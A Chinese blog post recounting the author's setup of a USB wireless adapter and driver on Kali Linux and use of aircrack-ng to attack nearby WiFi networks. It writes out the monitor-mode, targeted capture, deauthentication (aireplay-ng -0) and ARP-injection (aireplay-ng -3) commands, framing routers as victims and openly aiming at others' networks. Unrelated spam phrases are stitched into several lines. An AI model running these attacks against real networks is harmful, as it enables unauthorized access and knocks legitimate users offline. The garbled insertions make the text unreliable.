aircrack-ng的使⽤以及个⼈苦逼的⼼路历程cplasf
为什么要看关于aircrack-ng的东西呢? 因为可以破开WiFi啊 为什么⾮要破开WiFi呢? 就是为了 没错!
不开玩笑了啊 进⼊正题
⾸先 苦逼的我先看了关于aircrack-ng的资料 不看的话根本就⽆从⼊⼿ 了解到了⼀些基本的使⽤⽅法 接着就开始进⾏⾃⼰的试验阶段
这时候第⼀个问题出现了 放图
小学毕业班工作计划既然是⽆线⽹络攻击,那肯定就要⽤⽆线⽹卡啊
however!
好的 实验到这⾥就结束了 bye-bye
我可是学安全的男⼈啊 怎么可能这样就屈服了 既然⽆法识别内置的⽹卡 那就去买⼀个usb的⽆线⽹卡
jiangchao可是⽆线⽹卡那么多 哪⼀种可以⽤呢 我就⾛了弯路 去了那种有天线的
事实证明 ⼴告完全就是瞎胡扯 ⾸先 这个⽹卡的驱动不好配 虽然它预置了驱动安装程序 可是安装之后 没有⽤ 物理机识别不了 更不要提虚拟机了 也可能是我没有操作好 反正就是不好⽤ 然后我就去⼩西门换了 对,在⼩西门买的 就是图⼀个可以⽴即拿到
也没有准备买很好的 但是⽼板看我⼩ 欺负我长得好看 问我要的贵了⼀点 看他开店房租那么贵 也就没有计较这些好,回归正题
这个⽤的还⾏ 插上虚拟机以后可以识别出来 ⼀定要在VM的虚拟机那个选项⾥给选上
如果没有安装⽆线⽹卡 那么你的声卡下⾯除了⿏标 键盘 摄像头以外什么都没有 安装之后会有这个 出现usb和wlan 点击连接 我的有两个 但是截图的时候拔掉了⽹卡 所以有⼀个 插上之后记得两个都要连接上
接着
可以看到有wlan0了
但是问题⼜来了 你的⽆线⽹卡没有mac地址 没有驱动 这是情况下会出现什么问题呢
就是你拦截不到⼈家的arp请求包 arp request
我之前没有配 所以抓了⼆⼗多万份 ⾥⾯没有⼀个请求包 当然了 这种情况可能要两个原因
张天陈奕辰1 你的⽆线⽹卡没有配置好 没有装驱动
2 被害的路由器 固件不⾏ 你death⼀下 它卡住了
这种情况下 我更愿意去更改⾃⼰的配置 这个wifi不⾏ 我还可以袭击下⼀个啊 可是要是⾃⼰的配置不⾏ 那就永远不⾏
这时候鲁⼤师上场了驱动检测看⼀下是什么样的千万不要给它下载驱动看⼀下就可以了
我的是rel 8182eu 知道了就好办了
进⼊ linux
⾸先 apt-get update 然后 apt-get upgrade 更新⼀下源 还有系统软件
源的话 leafpad /etc/apt/sources.list 打开 选择⽤国内的源
#阿⾥云无线网卡怎么用
#kali官⽅源
#中科⼤的源
其实没有必要⽤那么多 ⽤⼏个就差不多了 我选了阿⾥云 中科⼤ 浙⼤ 可以适度的增加
都完成以后 就更新⼀下
接着
apt-get install -y linux-headers-$(uname -r)
这个指令 把headers给下载下来 编译环境需要⽤
杨洪基个人资料简介现在思考⼀下驱动怎么办 需要下载 我在github上到了
cd rtl8192
sudo make && sudo make install
接着就需要等⼀会 很快就好了
然后就会发现⾃⼰的⽆线⽹卡也有了mac ⽽且袭击的时候可以⽤macchanger来修改⼀下mac地址
好的 前期准备⼯作结束了 ⼯欲善其事,必先利其器
接着就要开始了
airmon-ng check kill 杀掉所有会妨碍到监听的进程
airmon-ng start wlan0 打开⽆线⽹卡
airodump-ng wlan0mon 开始监听
附近的wifi都出现了
上⾯的各个标志是什么意思 可以⾃⼰查⼀下
接着选定⼀个wifi
airodump-ng --bssid 路由器的mac -c 所在频道 --ivs -w 抓的包存放的地⽅
这个是开始专门的抓⼀个WiFi的包 --ivs可以过滤⼀些包 抓对⾃⼰有⽤的 这样数据包更⼩ 更⽅便爆破
不加的话就会抓所有的包 可以看到其他的东西 ⽤来ivs的话 最后的包后缀是ivs 不⽤的话 cap 应该是这个吧
这时候就开始抓包了
为了得到有效的包 就要开始攻击它 让它发送敏感包 ⽐如⼀直袭击已经连接上的客户端 让它掉线 只要它掉线了 就会发送登陆请求 这时候就可以抓回来分析了
aireplay-ng -0 20 -a 路由器的mac -c 客户端的mac wlan0mon
这时候就是death攻击
还有⼀种arp攻击
aireplay-ng -3 -b 路由器的mac -h 客户端的mac wlan0mon
arp requset注⼊攻击 数据包超级多 更好分析
等到
发布评论